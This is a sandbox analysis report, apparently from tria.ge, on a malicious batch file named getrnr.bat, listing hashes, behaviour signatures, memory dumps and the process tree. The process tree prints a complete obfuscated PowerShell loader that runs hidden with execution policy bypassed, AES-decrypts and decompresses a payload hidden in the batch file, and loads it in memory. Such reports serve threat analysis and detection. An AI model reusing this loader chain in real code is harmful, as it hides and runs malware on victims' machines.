Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    14/05/2024, 08:44

General

  • Target

    getrnr.bat

  • Size

    279KB

  • MD5

    167bee7350388d8357a2c7b7a67275de

  • SHA1

    15ad2fbb16264b7f595e600ae4319256b8c83153

  • SHA256

    d548ff4b3087f7bcf7a83019bef434fe23baef7489c3b92dac45b1ce3e542e5b

  • SHA512

    3ece3f5a0bf43264cc31f27ecee046f6093e61064683f5d1b3d6d62ec2c7f8ee7a9452869aeb7c636c02b98cf64852797a1581b6f50b7cb04f3e778242c7cf54

  • SSDEEP

    6144:ADe50b7Ynod1bLuUJV5q5oG+2mYKPvlxL32nAel/W:ADe+ftLuo2m1PNvy/W

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\getrnr.bat"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1644
    • C:\Users\Admin\AppData\Local\Temp\getrnr.bat.exe
      "getrnr.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_JiNoS = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\getrnr.bat').Split([Environment]::NewLine);foreach ($_CASH_Xcoxe in $_CASH_JiNoS) { if ($_CASH_Xcoxe.StartsWith(':: @')) { $_CASH_rknXM = $_CASH_Xcoxe.Substring(4); break; }; };$_CASH_rknXM = [System.Text.RegularExpressions.Regex]::Replace($_CASH_rknXM, '_CASH_', '');$_CASH_DIvnK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_rknXM);$_CASH_CznMv = New-Object System.Security.Cryptography.AesManaged;$_CASH_CznMv.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_CznMv.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_CznMv.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zEFw90YEtbw7ZpTxvvNz6EhXoNPmBL+mwZ3UVM6DVaM=');$_CASH_CznMv.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ozT1pR8RbqxqWOY1oBL98w==');$_CASH_bMTfl = $_CASH_CznMv.CreateDecryptor();$_CASH_DIvnK = $_CASH_bMTfl.TransformFinalBlock($_CASH_DIvnK, 0, $_CASH_DIvnK.Length);$_CASH_bMTfl.Dispose();$_CASH_CznMv.Dispose();$_CASH_TDSoU = New-Object System.IO.MemoryStream(, $_CASH_DIvnK);$_CASH_NcZjV = New-Object System.IO.MemoryStream;$_CASH_sJaCx = New-Object System.IO.Compression.GZipStream($_CASH_TDSoU, [IO.Compression.CompressionMode]::Decompress);$_CASH_sJaCx.CopyTo($_CASH_NcZjV);$_CASH_sJaCx.Dispose();$_CASH_TDSoU.Dispose();$_CASH_NcZjV.Dispose();$_CASH_DIvnK = $_CASH_NcZjV.ToArray();$_CASH_cXtdN = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_DIvnK);$_CASH_dJxRg = $_CASH_cXtdN.EntryPoint;$_CASH_dJxRg.Invoke($null, (, [string[]] ('')))
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2908

Network

MITRE ATT&CK Enterprise v15

Downloads

  • \Users\Admin\AppData\Local\Temp\getrnr.bat.exe

    Filesize

    462KB

    MD5

    852d67a27e454bd389fa7f02a8cbe23f

    SHA1

    5330fedad485e0e4c23b2abe1075a1f984fde9fc

    SHA256

    a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

    SHA512

    327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

  • memory/2908-5-0x000007FEF5F7E000-0x000007FEF5F7F000-memory.dmp

    Filesize

    4KB

  • memory/2908-6-0x000000001B610000-0x000000001B8F2000-memory.dmp

    Filesize

    2.9MB

  • memory/2908-7-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

    Filesize

    9.6MB

  • memory/2908-10-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

    Filesize

    9.6MB

  • memory/2908-11-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

    Filesize

    9.6MB

  • memory/2908-9-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

    Filesize

    9.6MB

  • memory/2908-8-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

    Filesize

    32KB

  • memory/2908-12-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

    Filesize

    9.6MB

  • memory/2908-13-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

    Filesize

    9.6MB